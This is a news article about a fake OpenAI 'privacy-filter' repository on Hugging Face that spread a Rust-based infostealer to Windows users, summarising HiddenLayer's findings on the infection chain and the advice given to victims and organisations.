The latest Hugging Face malware incident has raised serious concerns in the AI industry after attackers disguised dangerous software as an OpenAI release. Security experts warn that fake AI repositories are becoming a growing threat for developers, companies, and researchers using public AI platforms.
A new cybersecurity incident involving Hugging Face malware has exposed how dangerous public AI repositories can become when attackers hide malicious software inside seemingly trusted AI tools. Security researchers from HiddenLayer revealed that a fake AI repository pretending to be an OpenAI project managed to attract massive attention before finally being removed.
The malicious repository, called “Open-OSS/privacy-filter,” copied the appearance of a legitimate OpenAI Privacy Filter release almost perfectly. According to researchers, the attackers duplicated the original project description and added harmful files designed to infect users’ systems once downloaded.
The fake repository reportedly received nearly 244,000 downloads before being taken offline. However, researchers believe the attackers may have artificially boosted download numbers and likes to push the project into Hugging Face’s trending section. Within less than a day, the repository had already collected hundreds of likes, making it appear trustworthy to developers and AI enthusiasts.
This Hugging Face malware campaign mainly targeted Windows users. Victims who followed the provided setup instructions unknowingly activated malware hidden inside a file called loader.py. The fake project instructed users to run commands such as “start.bat” or execute Python scripts, which became the first step in the infection process.
Researchers explained that the malicious script initially looked like a normal AI model loader. Behind the scenes, though, it secretly downloaded additional harmful payloads from remote servers. The attackers also disabled SSL verification and used encoded URLs to hide their infrastructure from detection.
Once installed, the malware downloaded another batch file and created scheduled tasks on infected systems to maintain long-term access. To avoid suspicion, the scheduled tasks were designed to resemble legitimate Microsoft Edge update processes.
The final payload turned out to be a powerful Rust-based infostealer malware capable of stealing highly sensitive information from infected computers. Security experts said the malware specifically targeted Chromium-based browsers, Firefox browsers, Discord storage data, cryptocurrency wallets, FileZilla configurations, and important system details.
Researchers also warned that the malware attempted to disable Windows security protections, including antimalware scanning and event tracing tools. This allowed the attackers to operate more quietly and collect information without being noticed immediately.
The wider issue highlighted by this Hugging Face malware attack is the growing security risk connected to AI development workflows. Modern AI repositories often contain executable scripts, setup files, notebooks, dependencies, and automation tools. While developers usually focus on the AI model itself, attackers increasingly use these additional files to distribute malware.
Cybersecurity experts believe public AI registries are quickly becoming attractive targets because many developers directly clone repositories into corporate environments. These systems often contain source code, cloud credentials, internal company data, and access to sensitive infrastructure. A single compromised AI repository could therefore open the door to a much larger organizational breach.
Researchers from HiddenLayer discovered several additional Hugging Face repositories using nearly identical malicious code and infrastructure. This suggests the operation may be part of a broader campaign targeting AI developers and companies experimenting with open-source AI tools.
The attack also follows earlier reports involving poisoned AI software packages and fake installers distributed through public repositories. Experts now warn that attackers increasingly see AI ecosystems as an effective entry point into secure business networks.
Industry analysts say traditional software security tools are not fully prepared for these newer AI-related threats. Many standard scanning systems mainly inspect software libraries and dependency lists, while malicious scripts hidden in AI setup files can bypass detection more easily.
Security professionals are now urging organizations to adopt stronger controls for AI assets and repositories. Experts recommend carefully reviewing AI setup scripts before execution, avoiding unknown repositories, and monitoring any executable components bundled with AI projects.
HiddenLayer advised anyone who downloaded the fake OpenAI repository and executed its files on Windows systems to immediately treat their machines as compromised. The company recommended re-imaging infected systems and resetting browser sessions because stolen session cookies may allow attackers to bypass multi-factor authentication protections.
In our opinion, this Hugging Face malware incident is another warning sign that the rapid growth of AI technology is also creating new cybersecurity challenges. As AI adoption continues to expand across businesses and research communities, developers must become far more cautious about trusting public repositories without proper verification.
The AI industry is moving extremely fast, but security awareness must move even faster.

